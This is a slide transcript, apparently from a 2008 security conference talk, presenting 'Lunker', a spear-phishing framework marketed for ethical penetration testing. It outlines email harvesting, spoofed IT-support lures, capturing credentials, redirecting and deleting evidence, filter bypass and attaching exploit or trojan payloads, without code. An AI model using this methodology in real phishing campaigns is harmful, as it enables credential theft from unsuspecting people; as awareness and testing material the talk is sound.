Lunker: The Advanced Phishing Framework

Download Report

Transcript Lunker: The Advanced Phishing Framework 

Lunker: The Advanced Phishing
Framework
Joshua Perrymon
CEO, PacketFocus
Agenda
•
•
•
•
•
•
•
•
Intro
What is Lunker?
What can it do?
Attack Theory
Payloads
The Old Way
Demo
Questions
Who am I?
• Joshua Perrymon, CEO PacketFocus
• 12 yrs Experience “Ethical Hacking”
• Over 200 Spear-Phishing attacks in 4-5
languages
• 85% Success ratio using “Blacklist” emails from
the Internet
• MUCH higher using “Whitelist” Emails
What is Phishing
• Phishing is a method of Social Engineering used
to gain credentials, or have users perform a
specific action.
• We have all gotten these types of emails.
• Sent out to Millions
• Usually triggers SPAM filtering alerts
• Uses a known phishing site that is usually takes
down within a couple days if possible
What is Spear Phishing
• A directed Phishing Attack
• Only targets a handful of users
• Emails are harvested from the Internet or other
public places
• Very hard to stop as the attack isn’t sent out all
over the Internet
Attacking up the OSI
• We have been moving up the OSI (Open System
Interconnection) model with attacks.
Attacking up the OSI model cont.
How these attacks work
Doing this the “OLD” Way
• This takes time. But doesn’t require a lot of
technical skills.
•
•
•
•
•
•
•
Find emails
Find site to be phished
Create the site
Setup php mail spoof
Test
Send
Monitor
Using the Phishing Framework
• Easy and repeatable
Step 1.
PacketFocus.com 2008 Jperrymon
PacketFocus.com 2008 Jperrymon
Step 2: Enter Client Info
PacketFocus.com 2008 Jperrymon
Client Details
• This is entered into the local database. This
allows an audit trail of tests configuration and
results. The idea is to document each step
automatically, because no-one else wants to do
it.
• Enter URL and IP Info if provided
Step3: Email Recon
PacketFocus.com 2008 Jperrymon
PacketFocus.com 2008 Jperrymon
But everyone uses their company
email address right????
• This is hard to protect against most times.
Usually, internal email addresses must be used
in business communication. This can be leaked
to the Internet Search Engines.
• Search “@acme.com” and look through the
results.
PacketFocus.com 2008 Jperrymon
Step 4: Phishing Analysis
PacketFocus.com 2008 Jperrymon
On the lookout
• This module will actively search the target URL’s
and IP’s in scope to identify potential Phishing
Targets.
• Any site that requires credentials remotely
should be considered and identified.
• Top targets include Webmail, VPN, and website
logins.
• The tool will identify these portals and return
analysis based on previous information
gathered.
Step5: Select the Bait
PacketFocus.com 2008 Jperrymon
PacketFocus.com 2008 Jperrymon
Email is easy
• Most often, a simple email from spoofed
technical support will be enough to have a user
form over login and password details.
• Analysis will identify token passwords. Numeric
entries should trigger token MITM functions.
• Start analysis timers.
PacketFocus.com 2008 Jperrymon
Verify it works
PacketFocus.com 2008 Jperrymon
Now what?
• Login to the Phishing site locally to make sure it
captures the password.
• It’s easy to email the credentials. Be responsible
and store them encrypted.
• Modules could auto login based on template
used. Get email(), Get Attachment(), Get
Keyword(), Get Subject().
PacketFocus.com 2008 Jperrymon
Redirect Confusion
PacketFocus.com 2008 Jperrymon
Where am I?
• Redirection must be used after the user logs in
the first time. Error message, Google, etc
• Redirect to real site.
• Delete email sent to user after getting
credentials.
Spoof the email
PacketFocus.com 2008 Jperrymon
PacketFocus.com 2008 Jperrymon
Tony.. Tony Montana
• Setup a spoofed email.
• To goal is to have the user perform a pre-defined
action.
• Authority, realism, and language play a vital role
in a successful attacks.
• The key is gain trust as soon as possible.
• NLP (Neuro-Linguistical Programming)
• Milgram Experiment
Select Footer
PacketFocus.com 2008 Jperrymon
PacketFocus.com 2008 Jperrymon
Footer
• If you want to write a custom body, select a
footer template to give the attack structure.
Scenario Options
PacketFocus.com 2008 Jperrymon
PacketFocus.com 2008 Jperrymon
Pick one.
• Pre-defined spoofed email scenarios are
included with the framework. These are selected
conversations that usually get the response
desired based on actual field results.
• Scenarios:
▫
▫
▫
▫
Tech Support
Internal IT
3rd Party IT
End-User
PacketFocus.com 2008 Jperrymon
Stealthy
PacketFocus.com 2008 Jperrymon
Email Head
• Sometimes you need to modify the email
headers.
• We will probably put something in here to
identify the tool once it goes public.
Load the Ammo
PacketFocus.com 2008 Jperrymon
PacketFocus.com 2008 Jperrymon
Money Shot.
• This is what makes the framework stand out.
• The ability to add custom payloads to the
phishing email.
• XSS, Browser Exploit, Recon, Trojans, Exploits,
Backdoors, etc..
• Welcome to hack 2.0
Test Environment
PacketFocus.com 2008 Jperrymon
PacketFocus.com 2008 Jperrymon
Test 1.2.3.
• This module launches the local email client and
the locally hosted phishing site at the same time.
• The tester sends the spoofed email to a locally
configured account. This account is checked by
the Email Client as would a normal user.
• Look for mistakes. The smallest error can cause
the attack not to work.
Local Mode
PacketFocus.com 2008 Jperrymon
Start the Audit
PacketFocus.com 2008 Jperrymon
Just a little patience…
•
•
•
•
Monitor the web server, db, MTA, and monitor.
Setup MITM scripts to auto
Configure alarms and real-time logic.
Setup login options
▫ Capture
▫ Capture/Login
▫ Capture/Login/Scrape
DEMO
• Lets have a look at the current working version.
• How to bypass Outlook 2007 Phishing filters.
PacketFocus.com 2008 Jperrymon
What's Next
• MITM- 2nd Factor Authentication
• Advanced Payloads
•
•
•
•
•
•
▫
▫
▫
▫
XSS
CRSF
Browser Exploits
Recon to determine user browser, OS, etc.
Reporting 
Forum Support
Template Sharing
Training Modules
User reaction analysis module
Ability to customize the Templates
Thank You
• Thanks for sitting through this presentation. The
main aspect to take away from this is how
attacks are moving up the OSI model and
targeting the user (layer 8).
• It doesn’t take a lot of technical skills to perform
these types of attacks.
• User Awareness is the only way to mitigate this
risk. We can’t rely on technology.